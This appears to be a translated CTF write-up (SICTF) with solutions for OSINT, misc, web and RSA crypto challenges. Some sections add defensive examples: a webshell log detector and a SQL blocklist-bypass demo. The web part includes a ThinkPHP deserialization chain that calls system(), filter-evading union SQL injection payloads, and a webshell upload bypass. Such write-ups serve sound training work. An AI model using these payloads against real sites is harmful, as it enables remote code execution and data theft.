# OSINT

# [Sign-in] OSINT sign-in

Google reverse image search plus the tropical vegetation (no image search needed, really; I know the place far too well (bushi))

flag:SICTF

# This is the real sign-in

Google reverse image search gives the hotel name directly

Since the hint says the location is not the hotel, it must be the pier; searching Google Maps gives the pier's name

From the chat log we learn the destination is down a small lane at a well-known spot, which gives the flag

SICTF

# The Oppression of the Trees

Google reverse image search gives Dazhou, Sichuan

Searching "stadium" + "Dazhou" and cross-checking with satellite imagery gives the flag

flag:SICTF

# Really the sign-in

Google reverse image search turns up a similar Bilibili video thumbnail, so I opened it and compared the details, which match

Video link: https://www.bilibili.com/video/BV1nj411d72o

That gives the flag

flag:SICTF

# Sign-out

Reverse image search on the Spider-Man figure turns up a lead

https://www.reddit.com/r/Spiderman/comments/ch5kg7/spiderman_spotted_in_cape_town/

A video reveals the exact street: https://www.youtube.com/watch?v=Fu4pSfWVDAM

Google Street View then reveals the flag

# Misc

# Questionnaire

Fill in the questionnaire:

# Sign-in

Just reply to the official WeChat account

# GeekChallege

Connect to the server with a script and brute-force the password directly. The server answers each guess with a string that has a '1' at every position where the guessed character is correct, so sending one repeated character per round recovers the whole password position by position:

```python
from pwn import *
import string


HOST = 'yuanshen.life'
PORT = 00000          # placeholder port as given in the write-up
chars = string.printable


def guess_password():
    s = remote(HOST, PORT)
    server_greeting = s.recvuntil(b'>')
    print("Server greeting:", server_greeting.decode())
    pwd = ['0'] * 114     # the password is 114 characters long
    arrk = 0              # number of distinct characters matched so far
    for char in chars:
        # One repeated character per guess; the reply marks matching positions with '1'.
        guess = char * 114
        s.sendline(guess.encode())
        response = s.recvline().decode().strip()
        if '1' in response:
            arrk += 1
            print(f"Character found: {char}")
            print(f"Response: {response}")
            for i in range(len(response)):
                if response[i] == '1':
                    pwd[i] = char
        server_greeting = s.recvuntil(b'>')
        if arrk == 5:     # stop once five distinct characters have been placed
            break
    pwd1 = "".join(pwd)
    print(f"Final password: {pwd1}")
    # s.interactive()
    s.sendline(pwd1.encode())
    flag = s.recvuntil(b'}').split(b'\n')[-1]
    print('This is flag:\n', flag.decode())
    s.close()


guess_password()
```

# Real💨sign-in

Opening the archive in 010 Editor shows hidden data appended at its end

Convert it from hex

Per the challenge hint, the text is encrypted

That gives the archive password

The spectrogram of the audio reveals the image password

The file name tells us that "lagrange" must be in upper case

Decrypting with steghide gives the flag

# WHO?WHO?WHO

Brute-force the archive with a dictionary

Check for zero-width characters with a tool

The txt file name suggests that "shumu" is the key

DNA decoding script: https://github.com/omemishra/DNA-Genetic-Python-Scripts-CTF/blob/master/dnacode.py, then add the {} and _ according to the ciphertext

# New Year's regret

Mask brute-force

Convert the binary to an image, which reveals musical notes

Decoding the notes gives the last third of the flag

The Han Xin code scans to nothing useful; binwalk extracts result.txt

Repeated base64 decoding + rendering as an image produces a QR code, which scans to the first third of the flag

foremost on task.png yields a weapon image; per the hint, count the weapon's stars (a Punishing: Gray Raven weapon)

The three distinct digits suggest Morse code: 4 is ".", 5 is a space, 6 is "-"; decoding gives the middle third of the flag

# Log analysis 1

Analysing inbound and outbound connections, the IP is 192.168.222.200

# Log analysis 2

ChatGPT helped with the log analysis (process omitted)

Searching turned up AntSword
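The write-up found AntSword by searching the logs. As an added example (not part of the original write-up), here is the kind of check a defender would script over a web server access log: it parses Apache combined-format lines and flags two signals, the AntSword client's default user-agent string (it begins with `antSword/`; an operator can change it, so it is only one signal) and repeated referer-less POSTs to a single PHP script from one source, which is how a webshell client talks to its shell. The log lines are constructed for the demo.

```python
import re
from collections import Counter

# Constructed Apache combined-format log lines for the demo (not the challenge's logs).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2024:10:00:01 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Jan/2024:10:00:04 +0800] "GET /static/app.css HTTP/1.1" 200 90 "http://site.test/index.php" "Mozilla/5.0"
10.0.0.9 - - [05/Jan/2024:10:01:07 +0800] "POST /upload/cache.php HTTP/1.1" 200 85 "-" "antSword/v2.1"
10.0.0.9 - - [05/Jan/2024:10:01:09 +0800] "POST /upload/cache.php HTTP/1.1" 200 1460 "-" "antSword/v2.1"
10.0.0.9 - - [05/Jan/2024:10:01:15 +0800] "POST /upload/cache.php HTTP/1.1" 200 310 "-" "antSword/v2.1"
10.0.0.7 - - [05/Jan/2024:10:02:00 +0800] "POST /login.php HTTP/1.1" 302 0 "http://site.test/login.php" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Client strings worth alerting on. AntSword sends "antSword/<version>" unless the
# operator changes it, so treat this as one indicator among several.
UA_MARKERS = ("antsword",)


def parse_line(line):
    """Fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_webshell_activity(lines, post_threshold=3):
    """Return (ip, path, reason) findings: known webshell client user-agents, and
    repeated referer-less POSTs to one .php script from one source address."""
    findings = []
    referer_less_posts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if any(marker in rec["ua"].lower() for marker in UA_MARKERS):
            findings.append((rec["ip"], rec["path"], "webshell client user-agent: " + rec["ua"]))
        if rec["method"] == "POST" and rec["path"].lower().endswith(".php") and rec["referer"] == "-":
            referer_less_posts[(rec["ip"], rec["path"])] += 1
    for (ip, path), count in referer_less_posts.items():
        if count >= post_threshold:
            findings.append((ip, path, f"{count} referer-less POSTs to one script"))
    return findings


def suspicious_ips(lines, post_threshold=3):
    """Sorted list of source addresses with at least one finding."""
    return sorted({ip for ip, _, _ in find_webshell_activity(lines, post_threshold)})


if __name__ == "__main__":
    for hit in find_webshell_activity(SAMPLE_LOG.splitlines()):
        print(hit)
```

On real logs the user-agent check is the cheap first pass and the POST-count heuristic catches clients that spoof a browser string; both should point at the same script, which is then the file to pull off the box for review.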

# Mysterious traffic

Following the hint, a Baidu search finds an expert's blog post; just follow it step by step

https://fdlucifer.github.io/2022/01/05/decrypt-cs-traffic/

# WEB

# 100%_upload

First try to bypass the upload filter: php, php + digits, and similar tricks

Tried .user.ini and .htaccess with an image webshell; visiting url+/upload/xxx.png, none of them would connect

Then, looking at the home page, noticed http://yuanshen.life:36600/index.php?file=upload.php

Changing upload.php produces an error message

The error shows a direct include() file inclusion, so try including the flag

It cannot be included directly, so upload an image webshell instead; that errored too, so change the one-line webshell to the PHP short tag to get past it

Uploaded successfully, connect with AntSword

Got the flag

# Not just unserializa

Code audit reveals the serialization chain O:5:"start":2:{s:7:"welcome";O:2:"SE":1:{s:4:"year";O:2:"CR":1:{s:3:"new";s:8:"nonewea";s:8:"worries";s:8:"worries";}} s:3:"you";s:7:"I'mnew";}

The challenge hint gives RUN ln -sf /bin/bash /bin/sh

Try environment variable injection

https://tttang.com/archive/1450/#toc_0x04-dash (p 神's article)

Base64-encode the PoC chain as the source requires, and execute commands through the BASH_FUNC_xxx%% function definition

# EZ_SSRF

Code audit plus a directory scan of the site

admin.php exists:

```php
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
$allowed_ip = "127.0.0.1";
if ($_SERVER['REMOTE_ADDR'] !== $allowed_ip) {
    die("You can't get flag");
} else {
    echo $flag;
}
?>
```

Build a chain that makes the request from localhost

Then pass it in via Harder

?Harder= O:6:"client":1:

base64-encode it to get the encoded payload

# hacker

Per the challenge, build url/?username=joe

Still 0 results, so hand it straight to sqlmap

Injection fails, as expected

Try union-based injection and probe which characters are filtered

Roughly: & | --+ -- and or order like information and the space

and other key characters

Union-based injection retrieves the database name via database()

Use /**/ in place of spaces and %23 in place of --+

Because "information" is filtered, there is no way to enumerate column names

So a no-column-name injection is needed

Constructed payload:

yuanshen.life:3870/?username=1%27/**/union/**/select/**/concat(%602%60)/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flag)ctf%23

or username=1'/**/union/**/select/**/group_concat(`2`)/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flag)ctf%23 also works

The flag value comes out successfully
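The bypass above works because the filter is a keyword blocklist while the input is still spliced into the SQL text. As an added example (not from the write-up), this Python/sqlite3 snippet rebuilds that situation on a constructed database: a blocklist like the one probed above rejects the plain payload, the `/**/` variant slips through and reads the flag table from the string-built query, and the same input against a parameterized query returns nothing. Table names, the blocklist and the flag value are constructed for the demo; SQLite treats `/**/` as whitespace just as MySQL does.

```python
import sqlite3

# Blocklist in the spirit of the one the write-up probes: reject inputs containing any token.
BLOCKED_TOKENS = ("&", "|", "--", " ", "and", "or", "order", "like", "information")


def blocklist_rejects(value):
    low = value.lower()
    return any(tok in low for tok in BLOCKED_TOKENS)


def build_demo_db():
    """Constructed in-memory database for the demo (not the challenge's)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'joe', 'joe@example.test');
        CREATE TABLE flag (id INTEGER, flag TEXT);
        INSERT INTO flag VALUES (1, 'SICTF{constructed_demo_flag}');
    """)
    return db


def lookup_vulnerable(db, username):
    """Blocklist plus string formatting: the input still becomes part of the SQL text."""
    if blocklist_rejects(username):
        return []
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return db.execute(sql).fetchall()


def lookup_safe(db, username):
    """Bound parameter: the input is only ever a value, so no keyword filter is needed."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchall()


# Plain union payload with spaces and a comment terminator: the blocklist catches it.
NAIVE_PAYLOAD = "1' union select flag,2 from flag --"
# The same query with /**/ as whitespace and a tautology instead of a trailing comment.
COMMENT_PAYLOAD = "1'/**/union/**/select/**/flag,2/**/from/**/flag/**/where/**/'1'='1"

if __name__ == "__main__":
    db = build_demo_db()
    print("blocklist rejects naive payload:", blocklist_rejects(NAIVE_PAYLOAD))
    print("string-built query:", lookup_vulnerable(db, COMMENT_PAYLOAD))
    print("parameterized query:", lookup_safe(db, COMMENT_PAYLOAD))
```

The blocklist is a speed bump, not a control: whitespace has several spellings and the parser is happy to accept all of them. Binding parameters removes the problem instead of racing the attacker over the token list.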

# Oyst3rPHP

Looked around and found nothing, so dug up a copy of the source with a subdomain enumeration tool

Downloaded the source

index.php in the source says we need to find the third oyster function

Searching found all three oysters

Next, exploit each of them

The first oyster is an MD5 comparison

The second oyster is bypassed by passing key via POST

For Z3r4y, bypass the length check by appending 603THINKPHP at the end

Trigger an error and search for an exp using the version number shown in the error message

https://blog.csdn.net/weixin_45794666/article/details/123237118

Just fire the ready-made chain:

```php
<?php

namespace think\model\concern;

trait Attribute
{
    private $data = ["key" => "whoami"];
    private $withAttr = ["key" => "system"];
}

namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave = true;
    protected $withEvent = false;
    private $exists = true;
    private $force = true;
    protected $name;

    public function __construct($obj = "")
    {
        $this->name = $obj;
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model
{
}

$a = new Pivot();
$b = new Pivot($a);

echo base64_encode(serialize($b));
```

Run the script

and merge it with the previous one using &

# Reverse

# [Game][Battle City]

Edit the ldtx level file to make the level easier

After clearing it, win.png appears in the folder; scanning it gives the flag

# [Sign-in] Baby_C++

Looking at the program, it converts hex values to characters

# Crypto

# [Sign-in] Vigenere

Just brute-force it with a web tool:

# Sign-in, for sure!

Found the solution on 小鸡块's blog....

Roughly: by the quotient ring and the difference-of-cubes formula, the gcd of the coefficient of one term of the polynomial corresponding to img with img is img

```sage
from Crypto.Util.number import *

n = 8361361624563191168612863710516449028280757632934603412143152925186847721821552879338608951120157631182699762833743097837368740526055736516080136520584848113137087581886426335191207688807063024096128001406698217998816782335655663803544853496060418931569545571397849643826584234431049002394772877263603049736723071392989824939202362631409164434715938662038795641314189628730614978217987868150651491343161526447894569241770090377633602058561239329450046036247193745885174295365633411482121644408648089046016960479100220850953009927778950304754339013541019536413880264074456433907671670049288317945540495496615531150916647050158936010095037412334662561046016163777575736952349827380039938526168715655649566952708788485104126900723003264019513888897942175890007711026288941687256962012799264387545892832762304320287592575602683673845399984039272350929803217492617502601005613778976109701842829008365226259492848134417818535629827769342262020775115695472218876430557026471282526042545195944063078523279341459199475911203966762751381334277716236740637021416311325243028569997303341317394525345879188523948991698489667794912052436245063998637376874151553809424581376068719814532246179297851206862505952437301253313660876231136285877214949094995458997630235764635059528016149006613720287102941868517244509854875672887445099733909912598895743707420454623997740143407206090319567531144126090072331
e = 65537
c = 990174418341944658163682355081485155265287928299806085314916265580657672513493698560580484907432207730887132062242640756706695937403268682912083148568866147011247510439837340945334451110125182595397920602074775022416454918954623612449584637584716343806255917090525904201284852578834232447821716829253065610989317909188784426328951520866152936279891872183954439348449359491526360671152193735260099077198986264364568046834399064514350538329990985131052947670063605611113730246128926850242471820709957158609175376867993700411738314237400038584470826914946434498322430741797570259936266226325667814521838420733061335969071245580657187544161772619889518845348639672820212709030227999963744593715194928502606910452777687735614033404646237092067644786266390652682476817862879933305687452549301456541574678459748029511685529779653056108795644495442515066731075232130730326258404497646551885443146629498236191794065050199535063169471112533284663197357635908054343683637354352034115772227442563180462771041527246803861110504563589660801224223152060573760388045791699221007556911597792387829416892037414283131499832672222157450742460666013331962249415807439258417736128976044272555922344342725850924271905056434303543500959556998454661274520986141613977331669376614647269667276594163516040422089616099849315644424644920145900066426839607058422686565517159251903275091124418838917480242517812783383
k = 7

# Work in the quotient ring Zmod(n)[x] / (f) for a random polynomial f of degree k.
# Per the blog post above, a coefficient of a random element raised to the n-th
# power has a nontrivial gcd with n, which is the factor p.
R = Zmod(n)["x"]
while True:
    Q = R.quo(R.random_element(k))
    pp = gcd(ZZ(list(Q.random_element() ^ n)[1]), n)
    if pp != 1:
        qq = sum([pp**i for i in range(k)])   # second factor: 1 + p + ... + p^(k-1)
        rr = n // (pp * qq)
        assert n == pp * qq * rr
        break
phi = (pp - 1) * (qq - 1) * (rr - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))
# SICTF{d9428fc7-fa3a-4096-8ec9-191c0a4562ff}
```

# gggcccddd

When I first saw it I thought, isn't this a related-message attack? Just use the Franklin-Reiter related-message attack.

But after running it, it loaded for ages... something's off (

Call it a coincidence... at the time someone in the competition group posted Kicky_Mu's blog, so I went to have a look and found the solution in one of the posts

Just use that method:

```sage
from Crypto.Util.number import *


# Half-GCD on polynomials: with e = 65537 the degrees are far too large for plain
# Euclidean division, so the gcd is computed recursively on the top halves.
def HGCD(a, b):
    if 2 * b.degree() <= a.degree() or a.degree() == 1:
        return 1, 0, 0, 1
    m = a.degree() // 2
    a_top, a_bot = a.quo_rem(x^m)
    b_top, b_bot = b.quo_rem(x^m)
    R00, R01, R10, R11 = HGCD(a_top, b_top)
    c = R00 * a + R01 * b
    d = R10 * a + R11 * b
    q, e = c.quo_rem(d)
    d_top, d_bot = d.quo_rem(x^(m // 2))
    e_top, e_bot = e.quo_rem(x^(m // 2))
    S00, S01, S10, S11 = HGCD(d_top, e_top)
    RET00 = S01 * R00 + (S00 - q * S01) * R10
    RET01 = S01 * R01 + (S00 - q * S01) * R11
    RET10 = S11 * R00 + (S10 - q * S11) * R10
    RET11 = S11 * R01 + (S10 - q * S11) * R11
    return RET00, RET01, RET10, RET11


def GCD(a, b):
    print(a.degree(), b.degree())
    q, r = a.quo_rem(b)
    if r == 0:
        return b
    R00, R01, R10, R11 = HGCD(a, b)
    c = R00 * a + R01 * b
    d = R10 * a + R11 * b
    if d == 0:
        return c.monic()
    q, r = c.quo_rem(d)
    if r == 0:
        return d
    return GCD(d, r)


n = 71451784354488078832557440841067139887532820867160946146462765529262021756492415597759437645000198746438846066445835108438656317936511838198860210224738728502558420706947533544863428802654736970469313030584334133519644746498781461927762736769115933249195917207059297145965502955615599481575507738939188415191
c1 = 60237305053182363686066000860755970543119549460585763366760183023969060529797821398451174145816154329258405143693872729068255155086734217883658806494371105889752598709446068159151166250635558774937924668506271624373871952982906459509904548833567117402267826477728367928385137857800256270428537882088110496684
c2 = 20563562448902136824882636468952895180253983449339226954738399163341332272571882209784996486250189912121870946577915881638415484043534161071782387358993712918678787398065688999810734189213904693514519594955522460151769479515323049821940285408228055771349670919587560952548876796252634104926367078177733076253
e = 65537
a = 233
b = 9527
R.<x> = PolynomialRing(Zmod(n))
f = x^e - c1            # both polynomials vanish at x = m
g = (a*x+b)^e - c2

res = GCD(f, g)

m = -res.monic().coefficients()[0]   # gcd is x - m
print(m)
flag = long_to_bytes(int(m))
print(flag)
```

Then the result came out within a minute
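As an added example (not the write-up's Sage script, which needs HGCD because e = 65537 makes the polynomials enormous), here is the same Franklin-Reiter idea in plain Python with a small public exponent, where ordinary Euclidean polynomial gcd over Z_n suffices. The modulus, the exponent e = 3 and the message are constructed; the affine relation a = 233, b = 9527 is the challenge's. The point for a key owner is that two messages tied by a known affine map must never be encrypted under the same plain-RSA key, whatever the exponent.

```python
# Polynomials over Z_n are plain Python lists of coefficients, lowest degree first.

def trim(p):
    """Drop trailing zero coefficients in place and return the list."""
    while p and p[-1] == 0:
        p.pop()
    return p


def poly_sub(a, b, n):
    out = [0] * max(len(a), len(b))
    for i, c in enumerate(a):
        out[i] = c % n
    for i, c in enumerate(b):
        out[i] = (out[i] - c) % n
    return trim(out)


def poly_mul(a, b, n):
    out = [0] * (len(a) + len(b) - 1)
    for i, x in enumerate(a):
        for j, y in enumerate(b):
            out[i + j] = (out[i + j] + x * y) % n
    return trim(out)


def poly_pow(a, e, n):
    result = [1]
    for _ in range(e):
        result = poly_mul(result, a, n)
    return result


def poly_mod(a, b, n):
    """Remainder of a divided by b. The leading coefficient of b must be a unit mod n;
    if it were not, gcd(lc, n) would already be a factor of n."""
    a = trim(a[:])
    inv = pow(b[-1], -1, n)          # raises ValueError when lc(b) is not invertible
    while len(a) >= len(b):
        coef = (a[-1] * inv) % n
        shift = len(a) - len(b)
        for i, c in enumerate(b):
            a[shift + i] = (a[shift + i] - coef * c) % n
        trim(a)                      # the leading term has been cancelled
    return a


def poly_gcd(a, b, n):
    while b:
        a, b = b, poly_mod(a, b, n)
    return a


def franklin_reiter(n, e, c1, c2, a, b):
    """c1 = m^e and c2 = (a*m + b)^e mod n. Both f = x^e - c1 and g = (a x + b)^e - c2
    vanish at x = m, so their gcd is (x - m) up to a unit; read m off the linear gcd."""
    f = poly_sub(poly_pow([0, 1], e, n), [c1], n)
    g = poly_sub(poly_pow([b, a], e, n), [c2], n)
    h = poly_gcd(f, g, n)
    if len(h) != 2:
        raise ValueError("gcd is not linear; the messages are not related as assumed")
    return (-h[0] * pow(h[1], -1, n)) % n


# Constructed demo key and message (not the challenge's 1024-bit values).
N_DEMO = 1000000007 * 998244353
E_DEMO = 3
A_DEMO, B_DEMO = 233, 9527            # the affine relation used in the challenge
M_DEMO = 0xC0FFEE1234567              # constructed plaintext, well below n
C1_DEMO = pow(M_DEMO, E_DEMO, N_DEMO)
C2_DEMO = pow((A_DEMO * M_DEMO + B_DEMO) % N_DEMO, E_DEMO, N_DEMO)


def demo():
    return franklin_reiter(N_DEMO, E_DEMO, C1_DEMO, C2_DEMO, A_DEMO, B_DEMO)


if __name__ == "__main__":
    print(hex(demo()), hex(M_DEMO))
```

With e = 3 the Euclidean sequence has degrees 3, 3, 2, 1 and finishes instantly; the cost grows with e, which is exactly why the write-up's e = 65537 case needed the half-gcd routine.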

# 铜匠 (Coppersmith)

For this one, since I had seen similar challenge names before, as soon as I opened the script I checked whether Coppersmith could be applied

What we know: p in the challenge is a 512-bit prime, and leak is the first 112 base-5 digits of p

At the time I was thinking of binary Coppersmith, but the missing part turned out to be 253 bits, and img (source of the formula); clearly, even with brute force on top, the bit count is off by far too much... so I started to hesitate.

But then a question came up: why would the challenge give base 5?

So I generated random 512-bit primes and converted them to base 5, and the length was almost always 221, leaving 109 unknown digits

That felt like fewer unknown bits than the plain binary case, but I could not tell whether base-5 Coppersmith would work directly on 109 digits, so I first tried brute-forcing the lowest base-5 digit + base-5 Coppersmith, and the flag came out in about a minute (I was really rushing here... call it a guess)

```sage
# sage
from tqdm import *
from Crypto.Util.number import *
from gmpy2 import *
leak = "2011133132443111302000224204142244403203442000141102312242343143241244243020003333022112141220422134444214010012"
n = 85988668134257353631742597258304937106964673395852009846703777410474172989069717247424903079500594820235304351355706519069516847244761609583338251489134035212061654870087550317540291994559481862615812258493738064606592165529948648774081655902831715928483206013332330998262897765489820121129058926463847702821
e = 65537
c = 64708526479058278743788046708923650158905888858865427385501446781738669889375403360886995849554813207230509920789341593771929287415439407977283018525484281064769128358863513387658744063469874845446480637925790150835186431234289848506337341595817156444941964510251032210939739594241869190746437858135599624562
p0 = int(leak + "0" * 109, 5)    # known high base-5 digits; the low 109 digits are unknown
p = 0
for i in trange(5):               # brute-force the lowest base-5 digit
    PR.<x> = PolynomialRing(Zmod(n))
    f = p0 + i + x * 5            # remaining 108 unknown digits: x < 5**108
    f = f.monic()
    res = f.small_roots(X=5**108, beta=0.49, epsilon=0.01)
    if res != []:
        p = int(p0 + i + int(res[0]) * 5)
        assert is_prime(p)
        break
if p:
    q = n // p
    phi = (p - 1) * (q - 1)
    d = invert(e, phi)
    m = pow(c, d, n)
    print(long_to_bytes(int(m)))
```

# easyLattice (second blood)

Nothing much to say, it is a simple lattice similar to the one below:

img

But it needs balancing; I multiplied the numbers in the last column by 2**256:

```sage
from Crypto.Util.number import *

h = 9848463356094730516607732957888686710609147955724620108704251779566910519170690198684628685762596232124613115691882688827918489297122319416081019121038443
p = 11403618200995593428747663693860532026261161211931726381922677499906885834766955987247477478421850280928508004160386000301268285541073474589048412962888947
# Scale the second column so both coordinates of the target vector have similar size.
L = Matrix(ZZ, [[1, h * 2**256],
                [0, p * 2**256]])

m = abs(L.LLL()[0][0])
# print(m)
print(long_to_bytes(int(m)))
# SICTF{e3fea01c-18f3-4638-9544-9201393940a9}A\xf0\x89\x84
```
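As an added example, not the write-up's Sage code, here is the same two-dimensional lattice attack in plain Python with Lagrange-Gauss reduction, which in two dimensions returns an exact shortest vector without LLL. The prime, the message and the small multiplier s are constructed; the weight plays the role of the 2**256 factor above: the lattice spanned by (1, h·W) and (0, p·W) contains (m, s·W) whenever m·h ≡ s (mod p), and choosing W near bound(m)/bound(s) makes that vector shorter than every other lattice vector, so reduction hands it back.

```python
def gauss_reduce(u, v):
    """Lagrange-Gauss reduction of the 2-D integer lattice spanned by u and v.
    Returns (u, v) where u is a shortest nonzero vector of the lattice."""
    def dot(a, b):
        return a[0] * b[0] + a[1] * b[1]
    if dot(u, u) > dot(v, v):
        u, v = v, u
    while True:
        nu = dot(u, u)
        k = (2 * dot(u, v) + nu) // (2 * nu)      # nearest integer to <u,v>/<u,u>
        v = (v[0] - k * u[0], v[1] - k * u[1])
        if dot(v, v) >= nu:                       # v cannot be made shorter than u: reduced
            return u, v
        u, v = v, u


def recover_small_multiplier(h, p, weight):
    """Given h = s * m^-1 mod p with m and s both small, return (m, s).
    The lattice with basis (1, h*W) and (0, p*W) contains (m, s*W); W balances the two
    coordinates so that this vector is the shortest one and reduction returns it."""
    u, _ = gauss_reduce((1, h * weight), (0, p * weight))
    return abs(u[0]), abs(u[1]) // weight


# Constructed demo values (not the challenge's h and p).
P_DEMO = (1 << 127) - 1                            # the Mersenne prime 2^127 - 1
M_DEMO = int.from_bytes(b"SICTF{demo}", "big")     # constructed "flag", about 2^87
S_DEMO = 2027                                      # constructed small multiplier (a prime, so coprime to m)
H_DEMO = S_DEMO * pow(M_DEMO, -1, P_DEMO) % P_DEMO
WEIGHT = 1 << 77    # about bound(m) / bound(s): lifts s*W to the size of m, as the 2**256 did above


def demo():
    return recover_small_multiplier(H_DEMO, P_DEMO, WEIGHT)


if __name__ == "__main__":
    m, s = demo()
    print(m.to_bytes((m.bit_length() + 7) // 8, "big"), s)
```

Why the weight is needed: the determinant of the unweighted lattice is p, so its shortest vector is expected near sqrt(p), and a target (m, s) with m larger than sqrt(p) would not be found. Scaling the second column by W raises the determinant to p·W without lengthening (m, s·W) beyond about max(m, s·W), which is the same trick the 2**256 performs above.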

# [Advanced] 2024_New_Setback

When I first tried this one I had no idea, so I left it...

Close to the end, I thought I'd just search around online; maybe I'd hit a similar challenge?

What I searched for was: ctf def new(C, P, Q): c, d, p = C u1, v1 = P u2, v2 = Q assert happy(C, P) and happy(C, Q) u3 = (u1 * v2 + v1 * u2) * inverse(c * (1 + d * u1 * u2 * v1 * v2), p) % p v3 = (v1 * v2 - u1 * u2) * inverse(c * (1 - d * u1 * u2 * v1 * v2), p) % p return (int(u3), int(v3))

And I actually hit one, and it was the original challenge - RoHaLd....

Not only is the challenge code the same, the data is identical too...

So, nothing to say; the flag is presumably identical too... so I just submitted it

I'll study how this is actually solved after the contest (

# SuperbRSA

Nothing much to say, a common-modulus attack where e1 and e2 are not coprime:

```python
from libnum import *
from gmpy2 import *

n = 19006830358118902392432453595802675566730850352890246995920642811967821259388009049803513102750594524106471709641202019832682438027312468849299985832675191795417160553379580813410722359089872519372049229233732405993062464286888889084640878784209014165871696882564834896322508054231777967011195636564463806270998326936161449009988434249178477100127347406759932149010712091376183710135615375272671888541233275415737155953323133439644529709898791881795186775830217884663044495979067807418758455237701315019683802437323177125493076113419739827430282311018083976114158159925450746712064639569301925672742186294237113199023
c1 = 276245243658976720066605903875366763552720328374098965164676247771817997950424168480909517684516498439306387133611184795758628248588201187138612090081389226321683486308199743311842513053259894661221013008371261704678716150646764446208833447643781574516045641493770778735363586857160147826684394417412837449465273160781074676966630398315417741542529612480836572205781076576325382832502694868883931680720558621770570349864399879523171995953720198118660355479626037129047327185224203109006251809257919143284157354935005710902589809259500117996982503679601132486140677013625335552533104471327456798955341220640782369529
c2 = 11734019659226247713821792108026989060106712358397514827024912309860741729438494689480531875833287268454669859568719053896346471360750027952226633173559594064466850413737504267807599435679616522026241111887294138123201104718849744300769676961585732810579953221056338076885840743126397063074940281522137794340822594577352361616598702143477379145284687427705913831885493512616944504612474278405909277188118896882441812469679494459216431405139478548192152811441169176134750079073317011232934250365454908280676079801770043968006983848495835089055956722848080915898151352242215210071011331098761828031786300276771001839021
e1 = 55
e2 = 200

# k1*e1 + k2*e2 = gcd(e1, e2) = g = 5, so combining the ciphertexts gives m^g,
# not m; a g-th root finishes the job (exact as long as m^g < n).
_, k1, k2 = gcdext(e1, e2)
g = gcd(e1, e2)
m = pow(pow(c1, k1, n) * pow(c2, k2, n), 1, n)
print(long_to_bytes(iroot(mpz(m), int(g))[0]))
# SICTF{S0_Great_RSA_Have_Y0u_Learned?}
```
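As an added example (not the write-up's code), the common-modulus attack written out in pure Python on a constructed small key: extended Euclid gives s·e1 + t·e2 = g, combining the ciphertexts yields m^g mod n, and an exact integer g-th root recovers m as long as m^g < n. The exponents 55 and 200 are the challenge's; the primes and the message are constructed. The lesson for anyone issuing keys is that one modulus must never serve two public exponents.

```python
def egcd(a, b):
    """Extended Euclid: returns (g, s, t) with s*a + t*b = g = gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, s, t = egcd(b, a % b)
    return g, t, s - (a // b) * t


def iroot(x, k):
    """Integer k-th root of x >= 0 by Newton's method; returns (floor root, exact)."""
    if x < 2:
        return x, True
    r = 1 << ((x.bit_length() + k - 1) // k)   # start at or above the true root
    while True:
        y = ((k - 1) * r + x // pow(r, k - 1)) // k
        if y >= r:
            break
        r = y
    return r, pow(r, k) == x


def common_modulus(n, e1, c1, e2, c2):
    """Recover m from c1 = m^e1 and c2 = m^e2 under one modulus n. With g = gcd(e1, e2),
    c1^s * c2^t equals m^g mod n, which is the integer m^g whenever m^g < n."""
    g, s, t = egcd(e1, e2)
    mg = (pow(c1, s, n) * pow(c2, t, n)) % n   # negative exponents use modular inverses (Python 3.8+)
    if g == 1:
        return mg
    root, exact = iroot(mg, g)
    if not exact:
        raise ValueError(f"m^{g} wrapped around n; the {g}-th root is not exact")
    return root


# Constructed demo key (not the challenge's): two small primes, exponents from the write-up.
N_DEMO = 1000000007 * 998244353
E1_DEMO, E2_DEMO = 55, 200     # gcd is 5, so the attack yields m^5
M_DEMO = 1234                  # 1234^5 is about 2.9e15 < n, so the 5th root is exact
C1_DEMO = pow(M_DEMO, E1_DEMO, N_DEMO)
C2_DEMO = pow(M_DEMO, E2_DEMO, N_DEMO)


def demo():
    return common_modulus(N_DEMO, E1_DEMO, C1_DEMO, E2_DEMO, C2_DEMO)


if __name__ == "__main__":
    print(demo())
```

For the challenge's 2048-bit n a 40-byte flag raised to the fifth power stays far below n, which is why the root in the write-up is exact; with a larger message the wrap-around check above would fire and the root would have to be taken differently.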
